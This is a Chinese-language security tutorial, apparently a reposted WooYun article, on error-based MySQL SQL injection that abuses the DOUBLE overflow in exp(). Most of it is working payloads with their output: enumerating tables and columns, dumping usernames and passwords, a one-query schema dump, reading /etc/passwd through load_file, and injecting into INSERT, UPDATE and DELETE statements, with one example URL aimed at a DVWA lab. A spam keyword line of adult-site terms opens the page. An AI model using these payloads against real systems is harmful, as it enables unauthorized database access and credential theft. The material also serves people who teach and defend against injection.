自拍偷在线精品自拍偷,亚洲欧美中文日韩v在线观看不卡

使用exp進(jìn)行SQL報(bào)錯(cuò)注入

安全 數(shù)據(jù)安全
好消息好消息~作者又在MySQL中發(fā)現(xiàn)了一個(gè)Double型數(shù)據(jù)溢出。

0x01 前言概述

好消息好消息~作者又在MySQL中發(fā)現(xiàn)了一個(gè)Double型數(shù)據(jù)溢出。如果你想了解利用溢出來注出數(shù)據(jù),你可以讀一下作者之前發(fā)的博文:BIGINT Overflow Error based injections,drops上面也有對(duì)應(yīng)翻譯,具體見這里。當(dāng)我們拿到MySQL里的函數(shù)時(shí),作者比較感興趣的是其中的數(shù)學(xué)函數(shù),它們也應(yīng)該包含一些數(shù)據(jù)類型來保存數(shù)值。所以作者就跑去測(cè)試看哪些函數(shù)會(huì)出現(xiàn)溢出錯(cuò)誤。然后作者發(fā)現(xiàn),當(dāng)傳遞一個(gè)大于709的值時(shí),函數(shù)exp()就會(huì)引起一個(gè)溢出錯(cuò)誤。

使用exp進(jìn)行SQL報(bào)錯(cuò)注入

mysql> select exp(709);
+-----------------------+
| exp(709)              |
+-----------------------+
| 8.218407461554972e307 |
+-----------------------+
1 row in set (0.00 sec)

mysql> select exp(710);
ERROR 1690 (22003): DOUBLE value is out of range in 'exp(710)'

在MySQL中,exp與ln和log的功能相反,簡(jiǎn)單介紹下,就是log和ln都返回以e為底數(shù)的對(duì)數(shù),見等式:

 

 

enter image description here

 

 

 

enter image description here

mysql> select log(15);
+------------------+
| log(15)          |
+------------------+
| 2.70805020110221 |
+------------------+
1 row in set (0.00 sec)


mysql> select ln(15);
+------------------+
| ln(15)           |
+------------------+
| 2.70805020110221 |
+------------------+
1 row in set (0.00 sec)

 

指數(shù)函數(shù)為對(duì)數(shù)函數(shù)的反函數(shù),exp()即為以e為底的對(duì)數(shù)函數(shù),如等式:

 

enter image description here

mysql> select exp(2.70805020110221);
+-----------------------+
| exp(2.70805020110221) |
+-----------------------+
|                    15 |
+-----------------------+
1 row in set (0.00 sec)

 

0x02 注入

當(dāng)涉及到注入時(shí),我們使用否定查詢來造成“DOUBLE value is out of range”的錯(cuò)誤。作者之前的博文提到的,將0按位取反就會(huì)返回“18446744073709551615”,再加上函數(shù)成功執(zhí)行后返回0的緣故,我們將成功執(zhí)行的函數(shù)取反就會(huì)得到***的無符號(hào)BIGINT值。

mysql> select ~0;
+----------------------+
| ~0                   |
+----------------------+
| 18446744073709551615 |
+----------------------+
1 row in set (0.00 sec)


mysql> select ~(select version());
+----------------------+
| ~(select version())  |
+----------------------+
| 18446744073709551610 |
+----------------------+
1 row in set, 1 warning (0.00 sec)

我們通過子查詢與按位求反,造成一個(gè)DOUBLE overflow error,并借由此注出數(shù)據(jù)。

  1. >`exp(~(select*from(select user())x))`  
  2.  
  3.     mysql> select exp(~(select*from(select user())x));  
  4.     ERROR 1690 (22003): DOUBLE value is out of range in 'exp(~((select 'root@localhost' from dual)))' 

0x03 注出數(shù)據(jù)

得到表名:

 

  1. select exp(~(select*from(select table_name from information_schema.tables where table_schema=database() limit 0,1)x)); 

 

得到列名:

 

  1. select exp(~(select*from(select column_name from information_schema.columns where table_name='users' limit 0,1)x)); 

 

檢索數(shù)據(jù):

 

  1. select exp(~ (select*from(select concat_ws(':',id, username, passwordfrom users limit 0,1)x)); 

 

0x04 一蹴而就

這個(gè)查詢可以從當(dāng)前的上下文中dump出所有的tables與columns。我們也可以dump出所有的數(shù)據(jù)庫,但由于我們是通過一個(gè)錯(cuò)誤進(jìn)行提取,它會(huì)返回很少的結(jié)果。

  1. exp(~(select*from(select(concat(@:=0,(select count(*)from`information_schema`.columns where table_schema=database()and@:=concat(@,0xa,table_schema,0x3a3a,table_name,0x3a3a,column_name)),@)))x))  
  2.  
  3. http://localhost/dvwa/vulnerabilities/sqli/?id=1' or exp(~(select*from(select(concat(@:=0,(select count(*)from`information_schema`.columns where table_schema=database()and@:=concat(@,0xa,table_schema,0x3a3a,table_name,0x3a3a,column_name)),@)))x))-- -&Submit=Submit# 

 

enter image description here

 

0x05 讀取文件

你可以通過load_file()函數(shù)來讀取文件,但作者發(fā)現(xiàn)有13行的限制,該語句也可以在BIGINT overflow injections中使用。

  1. select exp(~(select*from(select load_file('/etc/passwd'))a));  
  2.  

 

enter image description here

 

注意,你無法寫文件,因?yàn)檫@個(gè)錯(cuò)入寫入的只是0。

  1. mysql> select exp(~(select*from(select 'hello')a)) into outfile 'C:/out.txt';  
  2. ERROR 1690 (22003): DOUBLE value is out of range in 'exp(~((select 'hello' from dual)))'      
  3.  
  4. # type C:\out.txt  

0x06 Injection in Insert

按部就班就好

  1. mysql> insert into users (id, username, passwordvalues (2, '' ^ exp(~(select*from(select user())x)), 'Eyre');  
  2. ERROR 1690 (22003): DOUBLE value is out of range in 'exp(~((select 'root@localhost' from dual)))' 

對(duì)于所有的insert,update和delete語句DIOS查詢也同樣可以使用。

  1. mysql> insert into users (id, username, passwordvalues (2, '' | exp(~(select*from(select(concat(@:=0,(select count(*)from`information_schema`.columns where table_schema=database()and@:=concat(@,0xa,table_schema,0x3a3a,table_name,0x3a3a,column_name)),@)))x)), 'Eyre');  
  2. ERROR 1690 (22003): DOUBLE value is out of range in 'exp(~((select '000  
  3. newdb::users::id  
  4. newdb::users::username  
  5. newdb::users::password' from dual)))' 

0x07 Injection in Update

  1. mysql> update users set password='Peter' ^ exp(~(select*from(select user())x)) where id=4;  
  2. ERROR 1690 (22003): DOUBLE value is out of range in 'exp(~((select 'root@localhost' from dual)))' 

0x08 Injection in Delete

  1. mysql> delete from users where id='1' | exp(~(select*from(select user())x));  
  2. ERROR 1690 (22003): DOUBLE value is out of range in 'exp(~((select 'root@localhost' from dual)))' 

和前面的BIGINT注入一樣,exp注入也適用于MySQL5.5.5及以上版本。以前的版本對(duì)于此情況則是“一言不發(fā)”。

  1. mysql> select version();  
  2. +---------------------+  
  3. | version()           |  
  4. +---------------------+  
  5. | 5.0.45-community-nt |  
  6. +---------------------+  
  7. 1 row in set (0.00 sec)   
  8.  
  9.  
  10. mysql> select exp(710);  
  11. +----------+  
  12. | exp(710) |  
  13. +----------+  
  14. |   1.#INF |  
  15. +----------+  
  16. 1 row in set (0.00 sec)   
  17.  
  18.  
  19. mysql> select exp(~0);  
  20. +---------+  
  21. | exp(~0) |  
  22. +---------+  
  23. |  1.#INF |  
  24. +---------+  
  25. 1 row in set (0.00 sec) 

可能還有其他的函數(shù)會(huì)產(chǎn)生這種報(bào)錯(cuò)呦。(有待你發(fā)現(xiàn)啦:)

責(zé)任編輯:藍(lán)雨淚 來源: 烏云知識(shí)庫
相關(guān)推薦

2010-12-14 11:30:11

2010-03-29 16:16:59

Oracle exp備

2010-12-20 16:04:30

2009-03-10 08:05:19

2013-11-07 09:31:22

2017-08-10 10:23:59

2024-05-06 13:34:28

WireGoogleGo

2010-04-13 14:35:17

2021-05-09 22:48:40

SQL數(shù)據(jù)庫變量

2019-07-05 08:12:36

SQLMAPsql注入

2024-08-19 08:16:57

@Resource@AutowiredSpring

2009-09-27 09:39:19

2020-10-26 07:04:29

SQL注入mysql

2013-05-02 15:09:22

2023-07-13 11:24:14

SQL優(yōu)化賦值

2021-08-09 15:00:36

SQL數(shù)據(jù)庫

2010-09-17 13:40:43

SQL更新

2011-10-19 10:47:56

2020-12-16 13:22:37

Web安全SQL工具

2010-09-27 11:17:31

點(diǎn)贊
收藏

51CTO技術(shù)棧公眾號(hào)